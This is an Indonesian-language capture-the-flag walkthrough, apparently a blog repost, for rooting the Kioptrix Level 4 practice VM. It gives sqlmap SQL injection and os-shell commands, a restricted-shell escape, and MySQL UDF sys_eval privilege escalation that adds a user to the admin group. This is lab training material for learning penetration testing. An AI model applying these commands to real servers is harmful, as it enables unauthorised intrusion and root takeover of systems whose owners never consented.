Mendapatkan Root Saluran Pada Kioptrix Level 4

Pada kesempatan kali ini aku akan membahas cara mendapat root terusan pada server Kioptrix Level 4. Pada challenge level ini tidak mengecewakan susah sebab di server nya sudah dilengkapi rule iptables sehingga beberapa command menyerupai wget dari port 80 di block, dll.
Oke pribadi saja .

Untuk image OracleVM nya download disini :

Download Kioptrix Level 4

Ini tampilan awal dari webserver Kioptrix Level 4.

Saya mencoba melaksanakan bypass dengan memasukkan user dan password '=' 'or' tapi ternyata gagal. Berarti emmang tidak sanggup di bypass.
Tapi dikala aku masukkan password dan user nya berupa ' ( petik satu ) , aku mendapat error.

Yup, kemungkinan vuln sqli.
Saya coba melaksanakan sqli post data memakai sqlmap.
Namun sebelumya aku gunakan live http header untuk meng-capture post di form login tadi.

sehingga command di sqlmap nya :
yuyudhn@linuxsec $ sqlmap -u "http://192.168.43.173/checklogin.php --data="myusername=%27&mypassword=%27&Submit=Login" --dbs .
Lanjutkan terus hingga menemukan password dan username nya.

Ternyata password nya plantext. Saya coba login dengan user john, sebab password nya lebih gampang diingat.
Namun dikala aku login ternyata hanya tampilan username dan password saja.

Karena tidak ada clue lain , kita coba spawn shell via sqlmap.
 yuyudhn@linuxsec $ sqlmap -u "http://192.168.43.173/checklogin.php --data="myusername=%27&mypassword=%27&Submit=Login" --os-shell

Untuk web server pilih php, direktori nya pilih /var/www , sebab kita tadi sudah tahu di awal.

Sekarang kita coba mencari isu database dengan melihat source checklogin.php .
os-shell> cat checklogin.php

Oppss... root user without password.

Kita tinggalkan dulu. Sekarang kita coba login ssh dengan user john dan password MyNameIsJohn .
Ternyata masuk.

Namun ternyata command command nya dibatasi.
Dan sehabis googling kesana kemari alhasil aku tau jikalau ini nama nya lshell ( limited shell ) .
Tapi tampaknya di versi yang terinstall disini masih terdapat bug.
Sehingga kita sanggup "keluar" dari batasan tadi dengan command :
john$ echo os.system('/bin/sh')
Ini untuk memanggil bash interpreter.

Karena goal final yaitu mendapat hak terusan root dengan cara apapun, aku pun mencoba untuk mendapat root dengan sudo. Tapi ternyata gagal.

Saya coba login ke mysql dengan root user dan tanpa password. ( di step sebelumnya kita sudah mengetahui jikalau root tidak di password )
$ mysql -u root

Nah kita tau versi MySQL nya yaitu versi 5 dimana disini mendukung command untuk memanggil perintah eksternal lewat mysql pengunakan plugins mysqludf.
mysql> quit
$ whereis lib_mysqludf_sys.so

Nice, ternyata kioptrix sudah menyediakannya untuk kita sehingga kita tidak perlu mendownloadnya.
Kita masuk lagi ke mysql dan masuk ke salahsatu database.

Namun dikala aku memasukkan command :
mysql> select sys_eval('id');
Ternyata mendapat error sebab module nya tidak ada.
Sekarang masukkan command :
mysql> create function sys_eval returns string soname 'lib_mysqludf_sys.so';

root...
Sebenarnya sebab goal dari Kioptrix yaitu mendapat root, kita sudah selesai disini.
Tapi aku coba untuk mengangkat user john menjadi sudoers.
mysql> select sys_eval('usermod -a -G admin john');

mysql>exit
$ sudo su
root@Kioptrix4:/home/john# id
uid=0(root) gid=0(root) groups=0(root)
root@Kioptrix4:/home/john# whoami
root

Done..
Untuk video nya sanggup disimak disini :

Nah sekian tutorial kali ini, semoga bermanfaat.
Share juga ke sahabat sahabat mu semoga mereka tau.
Sumber https://www.linuxsec.org/

Share this post